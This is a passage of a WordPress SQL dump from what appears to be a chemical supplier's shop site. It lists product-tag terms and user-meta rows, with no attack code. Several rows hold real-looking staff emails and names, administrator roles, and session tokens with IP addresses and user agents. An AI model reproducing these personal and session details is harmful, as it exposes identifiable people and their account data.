INSERT INTO `wp_terms` VALUES (471, 'AGL 683', 'agl-683', 0); 
INSERT INTO `wp_terms` VALUES (472, 'AGL 829', 'agl-829', 0); 
INSERT INTO `wp_terms` VALUES (473, 'Valve', 'valve', 0); 
INSERT INTO `wp_terms` VALUES (474, 'Corrugator', 'corrugator', 0); 
INSERT INTO `wp_terms` VALUES (475, 'AGL', 'agl', 0); 
INSERT INTO `wp_terms` VALUES (476, '683', '683', 0); 
INSERT INTO `wp_terms` VALUES (477, 'Gearbox', 'gearbox', 0); 
INSERT INTO `wp_terms` VALUES (478, 'Product', 'product', 0); 
INSERT INTO `wp_terms` VALUES (479, 'Selection', 'selection', 0); 
INSERT INTO `wp_terms` VALUES (480, 'Steam', 'steam', 0); 
INSERT INTO `wp_terms` VALUES (481, 'Control', 'control', 0); 
INSERT INTO `wp_terms` VALUES (482, 'mold release agent', 'mold-release-agent', 0); 
INSERT INTO `wp_terms` VALUES (483, 'PTFE mold release', 'ptfe-mold-release', 0); 
INSERT INTO `wp_terms` VALUES (484, 'X-Si', 'x-si', 0); 
INSERT INTO `wp_terms` VALUES (485, 'Automotive', 'automotive', 0); 
INSERT INTO `wp_terms` VALUES (486, 'Automotive Grease', 'automotive-grease', 0); 
INSERT INTO `wp_terms` VALUES (487, 'Oxygen Pump Lubricant', 'oxygen-pump-lubricant', 0); 
INSERT INTO `wp_terms` VALUES (488, 'VPF', 'vpf', 0); 
INSERT INTO `wp_terms` VALUES (489, 'Dry Film', 'dry-film', 0); 
INSERT INTO `wp_terms` VALUES (490, 'Food Grade Lubricants', 'food-grade-lubricants', 0); 
INSERT INTO `wp_terms` VALUES (491, 'Noise Vibration Harshness', 'noise-vibration-harshness', 0); 
INSERT INTO `wp_terms` VALUES (492, 'KS 1220', 'ks-1220', 0); 
INSERT INTO `wp_terms` VALUES (493, 'conformal coatings', 'conformal-coatings', 0); 
INSERT INTO `wp_terms` VALUES (494, 'coating', 'coating', 0); 
INSERT INTO `wp_terms` VALUES (495, 'MS-470C', 'ms-470c', 0); 
INSERT INTO `wp_terms` VALUES (496, 'circuit board coating', 'circuit-board-coating', 0); 
INSERT INTO `wp_terms` VALUES (497, 'Krytox Automotive', 'krytox-automotive', 0); 
INSERT INTO `wp_terms` VALUES (498, 'Bearing', 'bearing', 0); 
INSERT INTO `wp_terms` VALUES (499, 'Lubrication', 'lubrication', 0); 
INSERT INTO `wp_terms` VALUES (500, 'Prepare Bearings', 'prepare-bearings', 0); 
INSERT INTO `wp_terms` VALUES (501, 'Specialty Solvent', 'specialty-solvent', 0); 
INSERT INTO `wp_terms` VALUES (502, '226 FG', '226-fg', 0); 
INSERT INTO `wp_terms` VALUES (503, 'MS-122AV', 'ms-122av', 0); 
INSERT INTO `wp_terms` VALUES (504, 'MS-122AVL', 'ms-122avl', 0); 
INSERT INTO `wp_terms` VALUES (505, 'Mil Spec', 'mil-spec', 0); 
INSERT INTO `wp_terms` VALUES (506, 'NSN', 'nsn', 0); 
INSERT INTO `wp_terms` VALUES (507, 'Polyurethane Mold Release Agents', 'polyurethane-mold-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (508, 'Mold Release Agents', 'mold-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (509, 'Mold Release Agents', 'mold-release-agents', 0); 
INSERT INTO `wp_terms` VALUES (510, 'Skin Degreaser', 'skin-degreaser', 0); 
INSERT INTO `wp_terms` VALUES (511, 'EMI/RFI Conductive Coating', 'emirfi-conductive-coating', 0); 
INSERT INTO `wp_terms` VALUES (512, 'Miller-Stephenson Medical', 'miller-stephenson-medical', 0); 
INSERT INTO `wp_terms` VALUES (514, 'Clearance', 'clearance', 0); 
INSERT INTO `wp_terms` VALUES (515, 'Sootblower / Gearbox', 'gearbox-series', 0); 
INSERT INTO `wp_terms` VALUES (516, 'Fluoroguard', 'fluoroguard', 0); 
INSERT INTO `wp_terms` VALUES (517, 'FG Series', 'fg-corrugator-grease', 0); 
INSERT INTO `wp_terms` VALUES (518, 'AGL Series', 'agl-series', 0); 
INSERT INTO `wp_terms` VALUES (519, 'TM7 Series', 'tm7-series', 0); 
INSERT INTO `wp_terms` VALUES (520, 'Functional Polymers', 'functional-polymers', 0); 
INSERT INTO `wp_terms` VALUES (521, 'Industrial &amp; Medical Coatings', 'industrial-medical-coatings', 0); 
INSERT INTO `wp_terms` VALUES (522, 'Medical Device Coatings', 'medical-device-coatings', 0); 
INSERT INTO `wp_terms` VALUES (523, 'Medical Wire Coatings', 'medical-wire-coatings', 0); 
INSERT INTO `wp_terms` VALUES (524, 'Industrial Wire Coatings', 'industrial-wire-coatings', 0); 
INSERT INTO `wp_terms` VALUES (525, 'ReleaSys™ Aerosol', 'releasys-aerosol', 0); 
INSERT INTO `wp_terms` VALUES (526, 'ReleaSys™ Liquid', 'injection-molding', 0); 
INSERT INTO `wp_terms` VALUES (527, 'PTFE Aerosol (MS-122)', 'ptfe-aerosol-spray', 0); 
INSERT INTO `wp_terms` VALUES (528, 'PTFE Bulk Liquid (MS-143)', 'ptfe-mold-release-liquid', 0); 
INSERT INTO `wp_terms` VALUES (529, 'Specialty Mold Release', 'specialty-mold-release', 0); 
INSERT INTO `wp_terms` VALUES (530, 'ReleaSys 7300', 'releasys-7300', 0); 
INSERT INTO `wp_terms` VALUES (531, '7300', '7300', 0);
#
# End of data contents of table `wp_terms`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_usermeta`


#
# Delete any existing table `wp_usermeta`
#

DROP TABLE IF EXISTS `wp_usermeta`;


#
# Table structure of table `wp_usermeta`
#

CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=35694 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_usermeta`
#
 
INSERT INTO `wp_usermeta` VALUES (1, 1, 'nickname', 'ddillulio@mschem.com'); 
INSERT INTO `wp_usermeta` VALUES (2, 1, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3, 1, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4, 1, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5, 1, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6, 1, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7, 1, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (8, 1, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9, 1, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (11, 1, 'wp_user_level', '10'); 
INSERT INTO `wp_usermeta` VALUES (12, 1, 'dismissed_wp_pointers', 'aioseop_menu_220'); 
INSERT INTO `wp_usermeta` VALUES (13, 1, 'show_welcome_panel', '1'); 
INSERT INTO `wp_usermeta` VALUES (15, 1, 'wp_user-settings', 'mfold=o&libraryContent=browse&editor=tinymce&widgets_access=off&uploader=1&post_dfw=off&posts_list_mode=list&hidetb=1'); 
INSERT INTO `wp_usermeta` VALUES (16, 1, 'wp_user-settings-time', '1500492764'); 
INSERT INTO `wp_usermeta` VALUES (17, 1, 'wp_dashboard_quick_press_last_post_id', '4759'); 
INSERT INTO `wp_usermeta` VALUES (18, 1, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (19, 1, 'closedpostboxes_page', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (20, 1, 'metaboxhidden_page', 'a:6:{i:0;s:11:"postexcerpt";i:1;s:10:"postcustom";i:2;s:16:"commentstatusdiv";i:3;s:7:"slugdiv";i:4;s:9:"authordiv";i:5;s:29:"wp_statistics_editor_meta_box";}'); 
INSERT INTO `wp_usermeta` VALUES (21, 1, 'managenav-menuscolumnshidden', 'a:5:{i:0;s:11:"link-target";i:1;s:11:"css-classes";i:2;s:3:"xfn";i:3;s:11:"description";i:4;s:15:"title-attribute";}'); 
INSERT INTO `wp_usermeta` VALUES (22, 1, 'metaboxhidden_nav-menus', 'a:10:{i:0;s:30:"woocommerce_endpoints_nav_link";i:1;s:20:"add-post-type-blocks";i:2;s:21:"add-post-type-product";i:3;s:27:"add-post-type-featured_item";i:4;s:12:"add-post_tag";i:5;s:20:"add-block_categories";i:6;s:15:"add-product_cat";i:7;s:15:"add-product_tag";i:8;s:26:"add-featured_item_category";i:9;s:21:"add-featured_item_tag";}'); 
INSERT INTO `wp_usermeta` VALUES (23, 1, 'nav_menu_recently_edited', '6'); 
INSERT INTO `wp_usermeta` VALUES (24, 1, 'edit_page_per_page', '20'); 
INSERT INTO `wp_usermeta` VALUES (25, 2, 'nickname', 'Zayyan'); 
INSERT INTO `wp_usermeta` VALUES (26, 2, 'first_name', 'Zayyan'); 
INSERT INTO `wp_usermeta` VALUES (27, 2, 'last_name', 'Chowdhury'); 
INSERT INTO `wp_usermeta` VALUES (28, 2, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (29, 2, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (30, 2, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (31, 2, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (32, 2, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (33, 2, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (34, 2, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (35, 2, 'wp_user_level', '10'); 
INSERT INTO `wp_usermeta` VALUES (36, 2, 'dismissed_wp_pointers', 'aioseop_menu_220'); 
INSERT INTO `wp_usermeta` VALUES (38, 2, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (39, 2, 'wp_dashboard_quick_press_last_post_id', '4871'); 
INSERT INTO `wp_usermeta` VALUES (40, 3, 'nickname', 'cpavlik@mschem.com'); 
INSERT INTO `wp_usermeta` VALUES (41, 3, 'first_name', 'Chris'); 
INSERT INTO `wp_usermeta` VALUES (42, 3, 'last_name', 'Pavlik'); 
INSERT INTO `wp_usermeta` VALUES (43, 3, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (44, 3, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (45, 3, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (46, 3, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (47, 3, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (48, 3, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (49, 3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (50, 3, 'wp_user_level', '10'); 
INSERT INTO `wp_usermeta` VALUES (51, 3, 'dismissed_wp_pointers', 'aioseop_menu_220'); 
INSERT INTO `wp_usermeta` VALUES (52, 2, 'wp_user-settings', 'libraryContent=browse&editor=html&hidetb=1&advImgDetails=show&posts_list_mode=list&imgsize=full&editor_plain_text_paste_warning=1'); 
INSERT INTO `wp_usermeta` VALUES (53, 2, 'wp_user-settings-time', '1503320110'); 
INSERT INTO `wp_usermeta` VALUES (54, 1, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (55, 1, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (56, 1, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (57, 1, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (58, 1, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (59, 1, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (60, 1, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (61, 1, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (62, 1, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (63, 1, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (64, 1, 'billing_email', 'ddillulio@mschem.com'); 
INSERT INTO `wp_usermeta` VALUES (65, 1, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (66, 1, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (67, 1, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (68, 1, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (69, 1, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (70, 1, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (71, 1, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (72, 1, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (73, 1, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (74, 1, 'last_update', '1472240621'); 
INSERT INTO `wp_usermeta` VALUES (75, 3, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (76, 3, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (77, 3, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (78, 3, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (79, 3, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (80, 3, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (81, 3, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (82, 3, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (83, 3, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (84, 3, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (85, 3, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (86, 3, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (87, 3, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (88, 3, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (89, 3, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (90, 3, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (91, 3, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (92, 3, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (93, 3, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (94, 3, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (95, 3, 'last_update', '1477414099'); 
INSERT INTO `wp_usermeta` VALUES (97, 3, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (98, 3, 'wp_dashboard_quick_press_last_post_id', '4876'); 
INSERT INTO `wp_usermeta` VALUES (99, 3, 'wp_user-settings', 'libraryContent=browse&editor=tinymce&hidetb=1&advImgDetails=show&post_dfw=off'); 
INSERT INTO `wp_usermeta` VALUES (100, 3, 'wp_user-settings-time', '1498492869'); 
INSERT INTO `wp_usermeta` VALUES (101, 3, 'nav_menu_recently_edited', '6'); 
INSERT INTO `wp_usermeta` VALUES (102, 3, 'managenav-menuscolumnshidden', 'a:5:{i:0;s:11:"link-target";i:1;s:11:"css-classes";i:2;s:3:"xfn";i:3;s:11:"description";i:4;s:15:"title-attribute";}'); 
INSERT INTO `wp_usermeta` VALUES (103, 3, 'metaboxhidden_nav-menus', 'a:10:{i:0;s:30:"woocommerce_endpoints_nav_link";i:1;s:20:"add-post-type-blocks";i:2;s:21:"add-post-type-product";i:3;s:27:"add-post-type-featured_item";i:4;s:12:"add-post_tag";i:5;s:20:"add-block_categories";i:6;s:15:"add-product_cat";i:7;s:15:"add-product_tag";i:8;s:26:"add-featured_item_category";i:9;s:21:"add-featured_item_tag";}'); 
INSERT INTO `wp_usermeta` VALUES (104, 1, 'closedpostboxes_product', 'a:2:{i:0;s:19:"tagsdiv-product_tag";i:1;s:26:"woocommerce-product-images";}'); 
INSERT INTO `wp_usermeta` VALUES (105, 1, 'metaboxhidden_product', 'a:2:{i:0;s:10:"postcustom";i:1;s:7:"slugdiv";}'); 
INSERT INTO `wp_usermeta` VALUES (106, 1, 'meta-box-order_product', 'a:3:{s:4:"side";s:84:"submitdiv,product_catdiv,tagsdiv-product_tag,postimagediv,woocommerce-product-images";s:6:"normal";s:84:"ux_drag_and_drop,postexcerpt,woocommerce-product-data,postcustom,slugdiv,commentsdiv";s:8:"advanced";s:0:"";}'); 
INSERT INTO `wp_usermeta` VALUES (107, 1, 'screen_layout_product', '2'); 
INSERT INTO `wp_usermeta` VALUES (109, 3, 'closedpostboxes_product', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (110, 3, 'metaboxhidden_product', 'a:2:{i:0;s:10:"postcustom";i:1;s:7:"slugdiv";}'); 
INSERT INTO `wp_usermeta` VALUES (111, 1, 'closedpostboxes_ywtm_tab', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (112, 1, 'metaboxhidden_ywtm_tab', 'a:1:{i:0;s:7:"slugdiv";}'); 
INSERT INTO `wp_usermeta` VALUES (113, 1, 'wp_media_library_mode', 'grid'); 
INSERT INTO `wp_usermeta` VALUES (116, 1, '_woocommerce_persistent_cart', 'a:1:{s:4:"cart";a:0:{}}'); 
INSERT INTO `wp_usermeta` VALUES (117, 2, 'closedpostboxes_product', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (118, 2, 'metaboxhidden_product', 'a:2:{i:0;s:10:"postcustom";i:1;s:7:"slugdiv";}'); 
INSERT INTO `wp_usermeta` VALUES (119, 1, 'meta-box-order_gsc_woo_g_car', 'a:3:{s:4:"side";s:9:"submitdiv";s:6:"normal";s:31:"gsc_woo_mb_main_metabox,slugdiv";s:8:"advanced";s:0:"";}'); 
INSERT INTO `wp_usermeta` VALUES (120, 1, 'screen_layout_gsc_woo_g_car', '2'); 
INSERT INTO `wp_usermeta` VALUES (121, 2, 'edit_product_cat_per_page', '14'); 
INSERT INTO `wp_usermeta` VALUES (122, 2, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (123, 2, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (124, 2, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (125, 2, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (126, 2, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (127, 2, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (128, 2, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (129, 2, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (130, 2, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (131, 2, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (132, 2, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (133, 2, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (134, 2, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (135, 2, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (136, 2, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (137, 2, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (138, 2, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (139, 2, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (140, 2, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (141, 2, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (142, 2, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (143, 2, 'last_update', '1473863062'); 
INSERT INTO `wp_usermeta` VALUES (158, 3, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (159, 1, 'meta-box-order_page', 'a:3:{s:4:"side";s:57:"submitdiv,pageparentdiv,postimagediv,ninja_forms_selector";s:6:"normal";s:105:"flatsome_page_options2,revisionsdiv,postexcerpt,postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv";s:8:"advanced";s:27:"aiosp,User_specific_content";}'); 
INSERT INTO `wp_usermeta` VALUES (160, 1, 'screen_layout_page', '2'); 
INSERT INTO `wp_usermeta` VALUES (161, 2, 'wplc_ma_agent', '1'); 
INSERT INTO `wp_usermeta` VALUES (162, 2, 'wplc_chat_agent_online', '1474659943'); 
INSERT INTO `wp_usermeta` VALUES (164, 1, 'wp_yoast_notifications', 'a:1:{i:0;a:2:{s:7:"message";s:499:"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href="https://yoa.st/rate-yoast-seo">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href="https://yoa.st/bugreport">please file a bug report</a> and we\'ll do our best to help you out.\n\n\n\n<a class="button" href="https://www.miller-stephenson.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell">Please don\'t show me this notification anymore</a>";s:7:"options";a:8:{s:4:"type";s:7:"warning";s:2:"id";s:19:"wpseo-upsell-notice";s:5:"nonce";N;s:8:"priority";d:0.8000000000000000444089209850062616169452667236328125;s:9:"data_json";a:0:{}s:13:"dismissal_key";N;s:12:"capabilities";s:14:"manage_options";s:16:"capability_check";s:3:"all";}}}'); 
INSERT INTO `wp_usermeta` VALUES (165, 1, 'wpseo_seen_about_version', '3.5'); 
INSERT INTO `wp_usermeta` VALUES (167, 2, 'wpseo_ignore_tour', '1'); 
INSERT INTO `wp_usermeta` VALUES (168, 1, 'wpseo_ignore_tour', '1'); 
INSERT INTO `wp_usermeta` VALUES (170, 5, 'nickname', 'Melissa'); 
INSERT INTO `wp_usermeta` VALUES (171, 5, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (172, 5, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (173, 5, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (174, 5, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (175, 5, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (176, 5, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (177, 5, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (178, 5, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (179, 5, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (180, 5, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (181, 5, '_yoast_wpseo_profile_updated', '1474980021'); 
INSERT INTO `wp_usermeta` VALUES (182, 5, 'session_tokens', 'a:1:{s:64:"ae325d0d8ce0582b5e35f3837d726af81b4524b470c8595014200ff790838438";a:4:{s:10:"expiration";i:1476189622;s:2:"ip";s:12:"23.25.246.78";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1474980022;}}'); 
INSERT INTO `wp_usermeta` VALUES (183, 5, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (184, 6, 'nickname', 'cmehta'); 
INSERT INTO `wp_usermeta` VALUES (185, 6, 'first_name', 'Chirag'); 
INSERT INTO `wp_usermeta` VALUES (186, 6, 'last_name', 'Mehta'); 
INSERT INTO `wp_usermeta` VALUES (187, 6, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (188, 6, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (189, 6, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (190, 6, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (191, 6, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (192, 6, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (193, 6, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (194, 6, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (195, 6, '_yoast_wpseo_profile_updated', '1474990742'); 
INSERT INTO `wp_usermeta` VALUES (197, 6, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (198, 6, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (199, 6, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (200, 6, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (201, 6, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (202, 6, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (203, 6, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (204, 6, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (205, 6, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (206, 6, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (207, 6, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (208, 6, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (209, 6, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (210, 6, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (211, 6, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (212, 6, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (213, 6, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (214, 6, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (215, 6, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (216, 6, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (217, 6, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (218, 6, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (219, 6, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (220, 6, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (221, 6, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (222, 6, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (223, 6, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (224, 6, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (225, 6, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (226, 6, 'last_update', '1493916197'); 
INSERT INTO `wp_usermeta` VALUES (227, 6, 'session_tokens', 'a:1:{s:64:"95a029a86e541a104985465623cefb6e0e7c63cd1299436d91be774ebaf51554";a:4:{s:10:"expiration";i:1502475690;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502302890;}}'); 
INSERT INTO `wp_usermeta` VALUES (228, 6, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (229, 7, 'nickname', 'dollielajeunesselj2225'); 
INSERT INTO `wp_usermeta` VALUES (230, 7, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (231, 7, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (232, 7, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (233, 7, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (234, 7, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (235, 7, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (236, 7, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (237, 7, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (238, 7, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (239, 7, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (240, 7, '_yoast_wpseo_profile_updated', '1475028056'); 
INSERT INTO `wp_usermeta` VALUES (241, 7, 'session_tokens', 'a:1:{s:64:"0739ccf70e6bb74bca7f04727acfd1ee78c0ff93bb171de330d541f5f9c80834";a:4:{s:10:"expiration";i:1476237657;s:2:"ip";s:13:"107.172.81.35";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1475028057;}}'); 
INSERT INTO `wp_usermeta` VALUES (242, 7, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (243, 8, 'nickname', 'asmith'); 
INSERT INTO `wp_usermeta` VALUES (244, 8, 'first_name', ''); 
